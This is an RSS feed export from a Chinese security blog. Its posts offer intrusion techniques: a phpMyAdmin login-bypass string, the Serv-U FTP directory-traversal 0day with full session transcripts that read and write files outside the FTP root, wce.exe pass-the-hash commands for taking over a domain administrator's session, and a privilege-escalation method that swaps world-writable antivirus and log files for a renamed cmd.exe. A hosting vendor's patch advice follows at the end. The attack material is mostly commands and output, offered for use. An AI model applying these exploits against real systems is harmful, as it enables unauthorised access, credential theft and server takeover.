<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>misssky&#039;sblog</title>
	<atom:link href="http://www.misssky.cn/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.misssky.cn</link>
	<description>关注网络安全</description>
	<lastBuildDate>Wed, 18 Apr 2012 04:45:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>PHPmyadmin 2.11.3+2.11.4万能密码</title>
		<link>http://www.misssky.cn/technical-articles/phpmyadmin-2-11-32-11-4-universal-password/</link>
		<comments>http://www.misssky.cn/technical-articles/phpmyadmin-2-11-32-11-4-universal-password/#comments</comments>
		<pubDate>Wed, 18 Apr 2012 04:45:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=133</guid>
		<description><![CDATA[PHPmyadmin 2.11.3 2.11.4
 
两个版本都有此漏洞
 
经测试确实可以用。。。
 
只需要输入账号  密码不需要输入
 
利用代码如下：
‘localhost’@'@”]]></description>
			<content:encoded><![CDATA[<p>PHPmyadmin 2.11.3 2.11.4</p>
<p>两个版本都有此漏洞</p>
<p>经测试确实可以用。。。</p>
<p>只需要输入账号  密码不需要输入</p>
<p>利用代码如下：<br />
‘localhost’@&#8217;@”</p>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/phpmyadmin-2-11-32-11-4-universal-password/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>aspx连接mysql数据库</title>
		<link>http://www.misssky.cn/technical-articles/aspx-to-connect-to-mysql-database/</link>
		<comments>http://www.misssky.cn/technical-articles/aspx-to-connect-to-mysql-database/#comments</comments>
		<pubDate>Mon, 09 Apr 2012 10:14:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=128</guid>
		<description><![CDATA[<a href='http://www.misssky.cn/technical-articles/aspx-to-connect-to-mysql-database/attachment/mysql/' rel='attachment wp-att-129'>mysql</a>今天提权中用到的 收藏下！]]></description>
			<content:encoded><![CDATA[<p><a href='http://www.misssky.cn/technical-articles/aspx-to-connect-to-mysql-database/attachment/mysql/' rel='attachment wp-att-129'>mysql</a>今天提权中用到的 收藏下！</p>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/aspx-to-connect-to-mysql-database/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Serv-U目录跳转</title>
		<link>http://www.misssky.cn/technical-articles/serv-u-jump-directory/</link>
		<comments>http://www.misssky.cn/technical-articles/serv-u-jump-directory/#comments</comments>
		<pubDate>Sat, 10 Dec 2011 13:56:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=125</guid>
		<description><![CDATA[<div class="hl-surround"><div class="hl-main">I m better than TESO!<br /><br />CONFIDENTIAL SOURCE MATERIALS!<br /><br />&nbsp;<br /><br />[*]----------------------------------------------------[*]<br /><br />&nbsp;&nbsp; &nbsp;Serv-U FTP Server Jail Break 0day<br /><br />&nbsp;&nbsp; &nbsp;Discovered By Kingcope<br /><br />&nbsp;&nbsp; &nbsp;Year 2011<br /><br />[*]----------------------------------------------------[*]<br /><br />&nbsp;<br /><br />Affected:<br /><br />220 Serv-U FTP Server v7.3 ready...<br /><br />220 Serv-U FTP Server v7.1 ready...<br /><br />220 Serv-U FTP Server v6.4 ready...<br /><br />220 Serv-U FTP Server v8.2 ready...<br /><br />220 Serv-U FTP Server v10.5 ready...<br /><br />&nbsp;<br /><br />[*]----------------------------------------------------[*]<br /><br />C:\Users\kingcope\Desktop&gt;ftp 192.168.133.134<br /><br />Verbindung mit 192.168.133.134 wurde hergestellt.<br /><br />220 Serv-U FTP Server v6.4 for WinSock ready...<br /><br />Benutzer (192.168.133.134:(none)): ftp&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (anonymous user :&gt;)<br /><br />331 User name okay, please send complete E-mail address as password.<br /><br />Kennwort:<br /><br />230 User logged in, proceed.<br /><br />ftp&gt; cd &quot;/..:/..:/..:/..:/program files&quot;<br /><br />250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files<br /><br />ftp&gt; ls -la<br /><br />200 PORT Command successful.<br /><br />150 Opening ASCII mode data connection for /bin/ls.<br /><br />dr--r--r--&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Nov 12 21:48 .<br /><br />dr--r--r--&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Nov 12 21:48 ..<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb 14&nbsp; 2011 Apache Software Foundatio<br /><br />n<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb&nbsp; 5&nbsp; 2011 ComPlus Applications<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 11 01:06 Common Files<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 16:57 CoreFTPServer<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 11 01:06 IIS Resources<br /><br />d---------&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 16:12 InstallShield<br /><br />Installation Information<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 29 15:07 Internet Explorer<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 16:12 Ipswitch<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb 12&nbsp; 2011 Java<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 26 13:19 NetMeeting<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 29 14:39 Outlook Express<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 15:39 PostgreSQL<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Nov 12 21:48 RhinoSoft.com<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb 12&nbsp; 2011 Sun<br /><br />d---------&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 29 15:13 Uninstall Information<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb&nbsp; 5&nbsp; 2011 VMware<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 15:34 WinRAR<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 26 13:30 Windows Media Player<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb&nbsp; 5&nbsp; 2011 Windows NT<br /><br />d---------&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb&nbsp; 5&nbsp; 2011 WindowsUpdate<br /><br />226 Transfer complete.<br /><br />FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s<br /><br />ftp&gt;<br /><br />[*]----------------------------------------------------[*]<br /><br />with write perms:<br /><br />ftp&gt; put foo.txt ..:/..:/..:/foobar &lt;&lt;-- writes foo into root of partition<br /><br />[*]----------------------------------------------------[*]<br /><br />and as anonymous ftp:<br /><br />ftp&gt; get ..:/..:/..:/..:/windows/system32/calc.exe yes<br /><br />200 PORT Command successful.<br /><br />150 Opening ASCII mode data connection for calc.exe (115712 Bytes).<br /><br />226 Transfer complete.<br /><br />FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s<br /><br />[*]----------------------------------------------------[*]<br /><br />&nbsp;<br /><br />This works to!!! :<br /><br />&nbsp;<br /><br />220 Serv-U FTP Server v7.3 ready...<br /><br />Benutzer (xx.xx.xx.xx:(none)): ftp<br /><br />331 User name okay, please send complete E-mail address as password.<br /><br />Kennwort:<br /><br />230 User logged in, proceed.<br /><br />ftp&gt; ls &quot;-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*&quot;<br /><br />200 PORT Command successful.<br /><br />150 Opening ASCII mode data connection for /bin/ls.<br /><br />.<br /><br />..<br /><br />AUTOEXEC.BAT<br /><br />boot.ini<br /><br />bootfont.bin<br /><br />bsmain_runtime.log<br /><br />CONFIG.SYS<br /><br />Documents and Settings<br /><br />FPSE_search<br /><br />Inetpub<br /><br />IO.SYS<br /><br />log<br /><br />MSDOS.SYS<br /><br />msizap.exe<br /><br />MSOCache<br /><br />mysql<br /><br />NTDETECT.COM<br /><br />ntldr<br /><br />Program Files<br /><br />RavBin<br /><br />RECYCLER<br /><br />Replay.log<br /><br />rising.ini<br /><br />System Volume Information<br /><br />TDDOWNLOAD<br /><br />WCH.CN<br /><br />WINDOWS<br /><br />wmpub<br /><br />226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.<br /><br />FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s<br /><br />&nbsp;<br /><br />[*]----------------------------------------------------[*]<br /><br />Sometimes you need to give it the path:<br /><br />&nbsp;<br /><br />ftp&gt; ls &quot;-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\&quot;<br /><br />ftp&gt; ls &quot;-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*&quot;<br /><br />200 PORT Command successful.<br /><br />150 Opening ASCII mode data connection for /bin/ls.<br /><br />.<br /><br />..<br /><br />360<br /><br />Adobe<br /><br />ASP.NET<br /><br />CCProxy<br /><br />CE Remote Tools<br /><br />cmak<br /><br />Common Files<br /><br />ComPlus Applications<br /><br />D-Tools<br /><br />FFTPServer<br /><br />HTML Help Workshop<br /><br />IISServer<br /><br />InstallShield Installation Information<br /><br />Intel<br /><br />Internet Explorer<br /><br />Java<br /><br />JavaSoft<br /><br />K-Lite Codec Pack<br /><br />Microsoft ActiveSync<br /><br />Microsoft Analysis Services<br /><br />Microsoft Device Emulator<br /><br />Microsoft MapPoint Web Service Samples<br /><br />Microsoft MapPoint Web Service SDK, Version 4.0<br /><br />Microsoft Office<br /><br />Microsoft Office Servers<br /><br />Microsoft Silverlight<br /><br />Microsoft SQL Server<br /><br />Microsoft Visual SourceSafe<br /><br />Microsoft Visual Studio 8<br /><br />Microsoft.NET<br /><br />MSBuild<br /><br />MSXML 6.0<br /><br />NetMeeting<br /><br />Outlook Express<br /><br />PortMap1.61<br /><br />Reference Assemblies<br /><br />Rising<br /><br />SQLXML 4.0<br /><br />SQLyog Enterprise<br /><br />STS2Setup_2052<br /><br />Symantec<br /><br />Thunder Network<br /><br />TSingVision<br /><br />Uninstall Information<br /><br />Windows Media Player<br /><br />Windows NT<br /><br />WindowsUpdate<br /><br />WinRAR<br /><br />226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.<br /><br />FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s<br /><br />ftp&gt;</div></div>]]></description>
			<content:encoded><![CDATA[<div class="hl-surround"><div class="hl-main">I m better than TESO!<br /><br />CONFIDENTIAL SOURCE MATERIALS!<br /><br />&nbsp;<br /><br />[*]----------------------------------------------------[*]<br /><br />&nbsp;&nbsp; &nbsp;Serv-U FTP Server Jail Break 0day<br /><br />&nbsp;&nbsp; &nbsp;Discovered By Kingcope<br /><br />&nbsp;&nbsp; &nbsp;Year 2011<br /><br />[*]----------------------------------------------------[*]<br /><br />&nbsp;<br /><br />Affected:<br /><br />220 Serv-U FTP Server v7.3 ready...<br /><br />220 Serv-U FTP Server v7.1 ready...<br /><br />220 Serv-U FTP Server v6.4 ready...<br /><br />220 Serv-U FTP Server v8.2 ready...<br /><br />220 Serv-U FTP Server v10.5 ready...<br /><br />&nbsp;<br /><br />[*]----------------------------------------------------[*]<br /><br />C:\Users\kingcope\Desktop&gt;ftp 192.168.133.134<br /><br />Verbindung mit 192.168.133.134 wurde hergestellt.<br /><br />220 Serv-U FTP Server v6.4 for WinSock ready...<br /><br />Benutzer (192.168.133.134:(none)): ftp&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (anonymous user :&gt;)<br /><br />331 User name okay, please send complete E-mail address as password.<br /><br />Kennwort:<br /><br />230 User logged in, proceed.<br /><br />ftp&gt; cd &quot;/..:/..:/..:/..:/program files&quot;<br /><br />250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files<br /><br />ftp&gt; ls -la<br /><br />200 PORT Command successful.<br /><br />150 Opening ASCII mode data connection for /bin/ls.<br /><br />dr--r--r--&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Nov 12 21:48 .<br /><br />dr--r--r--&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Nov 12 21:48 ..<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb 14&nbsp; 2011 Apache Software Foundatio<br /><br />n<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb&nbsp; 5&nbsp; 2011 ComPlus Applications<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 11 01:06 Common Files<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 16:57 CoreFTPServer<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 11 01:06 IIS Resources<br /><br />d---------&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 16:12 InstallShield<br /><br />Installation Information<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 29 15:07 Internet Explorer<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 16:12 Ipswitch<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb 12&nbsp; 2011 Java<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 26 13:19 NetMeeting<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 29 14:39 Outlook Express<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 15:39 PostgreSQL<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Nov 12 21:48 RhinoSoft.com<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb 12&nbsp; 2011 Sun<br /><br />d---------&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 29 15:13 Uninstall Information<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb&nbsp; 5&nbsp; 2011 VMware<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul&nbsp; 8 15:34 WinRAR<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Jul 26 13:30 Windows Media Player<br /><br />drw-rw-rw-&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb&nbsp; 5&nbsp; 2011 Windows NT<br /><br />d---------&nbsp; &nbsp;1 user&nbsp; &nbsp; &nbsp;group&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0 Feb&nbsp; 5&nbsp; 2011 WindowsUpdate<br /><br />226 Transfer complete.<br /><br />FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s<br /><br />ftp&gt;<br /><br />[*]----------------------------------------------------[*]<br /><br />with write perms:<br /><br />ftp&gt; put foo.txt ..:/..:/..:/foobar &lt;&lt;-- writes foo into root of partition<br /><br />[*]----------------------------------------------------[*]<br /><br />and as anonymous ftp:<br /><br />ftp&gt; get ..:/..:/..:/..:/windows/system32/calc.exe yes<br /><br />200 PORT Command successful.<br /><br />150 Opening ASCII mode data connection for calc.exe (115712 Bytes).<br /><br />226 Transfer complete.<br /><br />FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s<br /><br />[*]----------------------------------------------------[*]<br /><br />&nbsp;<br /><br />This works to!!! :<br /><br />&nbsp;<br /><br />220 Serv-U FTP Server v7.3 ready...<br /><br />Benutzer (xx.xx.xx.xx:(none)): ftp<br /><br />331 User name okay, please send complete E-mail address as password.<br /><br />Kennwort:<br /><br />230 User logged in, proceed.<br /><br />ftp&gt; ls &quot;-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*&quot;<br /><br />200 PORT Command successful.<br /><br />150 Opening ASCII mode data connection for /bin/ls.<br /><br />.<br /><br />..<br /><br />AUTOEXEC.BAT<br /><br />boot.ini<br /><br />bootfont.bin<br /><br />bsmain_runtime.log<br /><br />CONFIG.SYS<br /><br />Documents and Settings<br /><br />FPSE_search<br /><br />Inetpub<br /><br />IO.SYS<br /><br />log<br /><br />MSDOS.SYS<br /><br />msizap.exe<br /><br />MSOCache<br /><br />mysql<br /><br />NTDETECT.COM<br /><br />ntldr<br /><br />Program Files<br /><br />RavBin<br /><br />RECYCLER<br /><br />Replay.log<br /><br />rising.ini<br /><br />System Volume Information<br /><br />TDDOWNLOAD<br /><br />WCH.CN<br /><br />WINDOWS<br /><br />wmpub<br /><br />226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.<br /><br />FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s<br /><br />&nbsp;<br /><br />[*]----------------------------------------------------[*]<br /><br />Sometimes you need to give it the path:<br /><br />&nbsp;<br /><br />ftp&gt; ls &quot;-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\&quot;<br /><br />ftp&gt; ls &quot;-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*&quot;<br /><br />200 PORT Command successful.<br /><br />150 Opening ASCII mode data connection for /bin/ls.<br /><br />.<br /><br />..<br /><br />360<br /><br />Adobe<br /><br />ASP.NET<br /><br />CCProxy<br /><br />CE Remote Tools<br /><br />cmak<br /><br />Common Files<br /><br />ComPlus Applications<br /><br />D-Tools<br /><br />FFTPServer<br /><br />HTML Help Workshop<br /><br />IISServer<br /><br />InstallShield Installation Information<br /><br />Intel<br /><br />Internet Explorer<br /><br />Java<br /><br />JavaSoft<br /><br />K-Lite Codec Pack<br /><br />Microsoft ActiveSync<br /><br />Microsoft Analysis Services<br /><br />Microsoft Device Emulator<br /><br />Microsoft MapPoint Web Service Samples<br /><br />Microsoft MapPoint Web Service SDK, Version 4.0<br /><br />Microsoft Office<br /><br />Microsoft Office Servers<br /><br />Microsoft Silverlight<br /><br />Microsoft SQL Server<br /><br />Microsoft Visual SourceSafe<br /><br />Microsoft Visual Studio 8<br /><br />Microsoft.NET<br /><br />MSBuild<br /><br />MSXML 6.0<br /><br />NetMeeting<br /><br />Outlook Express<br /><br />PortMap1.61<br /><br />Reference Assemblies<br /><br />Rising<br /><br />SQLXML 4.0<br /><br />SQLyog Enterprise<br /><br />STS2Setup_2052<br /><br />Symantec<br /><br />Thunder Network<br /><br />TSingVision<br /><br />Uninstall Information<br /><br />Windows Media Player<br /><br />Windows NT<br /><br />WindowsUpdate<br /><br />WinRAR<br /><br />226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.<br /><br />FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s<br /><br />ftp&gt;</div></div>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/serv-u-jump-directory/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>滲透利器wce</title>
		<link>http://www.misssky.cn/technical-articles/penetration-tool-wce/</link>
		<comments>http://www.misssky.cn/technical-articles/penetration-tool-wce/#comments</comments>
		<pubDate>Fri, 09 Dec 2011 17:21:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=120</guid>
		<description><![CDATA[转自hack520's Blog
可以抓到當前登陸在上面的域用戶HASH，xp~2008 都可以~X64 沒測試~上3389時請用console上才可正常運行~

wce.exe -l 列出當前域用戶HASH，如果你是普通YU用戶~而超級DOMAIN ADMIN又ONLINE時~
得到他HASH 之後~

wce.exe -s pig:Domainname:00000000000000000000000000000000:4A59CF37F6A2307D14ABA1921E8BBFE6 //例如pig是DOMAIN ADMIN

就可以把此豬的HASH，繼承到你當前DOMAIN USER 上，你就是pig.你無敵~]]></description>
			<content:encoded><![CDATA[<p>转自hack520&#8242;s Blog<br />
可以抓到當前登陸在上面的域用戶HASH，xp~2008 都可以~X64 沒測試~上3389時請用console上才可正常運行~</p>
<p>wce.exe -l 列出當前域用戶HASH，如果你是普通YU用戶~而超級DOMAIN ADMIN又ONLINE時~<br />
得到他HASH 之後~</p>
<p>wce.exe -s pig:Domainname:00000000000000000000000000000000:4A59CF37F6A2307D14ABA1921E8BBFE6 //例如pig是DOMAIN ADMIN</p>
<p>就可以把此豬的HASH，繼承到你當前DOMAIN USER 上，你就是pig.你無敵~</p>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/penetration-tool-wce/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>星外提权新思路&amp;星外安全公告(提权漏洞)</title>
		<link>http://www.misssky.cn/technical-articles/freehost-mention-the-right-to-new-ideas/</link>
		<comments>http://www.misssky.cn/technical-articles/freehost-mention-the-right-to-new-ideas/#comments</comments>
		<pubDate>Tue, 21 Jun 2011 13:26:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=117</guid>
		<description><![CDATA[声明，这不是什么星外0DAY，这充其量只是一个在找不到可写可执行目录的一个提权思路。我不敢说是我最先发现的，可能有其他人也发现了，并且也在利用了。
其实无数实例证明了lcx前辈那句话，细节决定成败。这只是入侵渗透中的细节问题，刚好我注意到了。下面正文开始。

众所周知要成功提权星外主机就要找到可写可执行目录，可近来星外主机的目录设置越来越BT，几乎没有可写可执行目录。所以另一个“提权思路”出现了。寻找服务器上安装的第3方软件某些文件的权限问题来进行文件替换，将这些文件替换为我们的cmd.exe和cscript.exe来提权，经我测试发现以下服务器常用软件的某些文件权限为Everyone即为所有用户权限，可以修改，可以上传同文件名替换，删除，最重要的是还可以执行。

首先是我们可爱的360杀毒。

c:\Program Files\360\360Safe\AntiSection\mutex.db 360杀毒数据库文件
c:\Program Files\360\360Safe\deepscan\Section\mutex.db 360杀毒数据库文件
c:\Program Files\360\360sd\Section\mutex.db 360杀毒数据库文件

c:\Program Files\360\360Safe\deepscan\Section\mutex.db这个文件，只要安装了360杀毒就一定存在，并且有Everyone权限。其他2个文件不一定。

c:\Program Files\Helicon\ISAPI_Rewrite3\error.log 伪静态设置软件ISAPI Rewrite日志文件
c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log 伪静态设置软件ISAPI Rewrite日志文件
c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf 伪静态设置软件ISAPI Rewrite配置文件

主要是ISAPI Rewrite 3.0版本存在权限问题，老版本暂时没发现有此类问题。

c:\Program Files\Common Files\Symantec Shared\Persist.bak 诺顿杀毒事件日志文件

c:\Program Files\Common Files\Symantec Shared\Validate.dat 诺顿杀毒事件日志文件

c:\Program Files\Common Files\Symantec Shared\Persist.Dat 诺顿杀毒事件日志文件

诺顿杀毒可能局限于版本，我本机XP并未找到以上文件

以下是最后2个可替换文件
c:\windows\hchiblis.ibl 华盾服务器管理专家文件许可证

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

DU Meter的流量统计信息日志文件

暂时知道以上文件权限为Everyone，注意，即使可替换文件的所在目录你无权访问，也照样可以替换执行。比如D:\Program Files\360\360Safe\deepscan\Section\mutex.db，可D:\Program Files\360\360Safe\deepscan\Section目录没有访问权限，用BIN牛的aspx大马访问D:\Program Files\360\360Safe\deepscan\Sectio显示拒绝访问，可mutex.db文件在该目录下，你照样可以上传由cmd.exe换名后的mutex.db文件进行替换。

这样一来在没有找到可写可执行目录时候，不防查看服务器上是否安装了以上软件，有的话可以上传同文件名替换原文件为你的提权文件。这样就可以成功执行了。

===========================================================================

目录或文件的权限设置有错会造成入侵!
为了从根本上解决问题,我们建议所有用户升级受控端安装包到2011-3-15版,并点击设置"ASP.net严格安全模型",以下所说的问题所有设置了asp.net严格安全的用户不受影响.

对于服务器上的杀毒软件,我们建议装Mcafee,请不重装360,很多版本的360都有提权问题.

在2011-6-8星外发布了新版的星外杀马扫描工具(在群共享或星外后台可以下载)

在扫描结果中我们发现在大量服务器存在以下问题.

文件:C:\WINDOWS\TAPI\tsec.ini 
处理办法:直接完全删除这个文件(不要保留在回收站)

360的 
文件:C:\Program Files\360\360sd\Section\mutex.db 
文件:C:\Program Files\360\360Safe\deepscan\Section\mutex.db 
文件:C:\Program Files\360\360Safe\AntiSection\mutex.db 
处理办法:直接完全删除360,所有360删除光后留下的文件都要删除

Flash: 
文件:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx 
处理办法:直接完全删除(不要保留在回收站),不要在服务器上装Flash组件


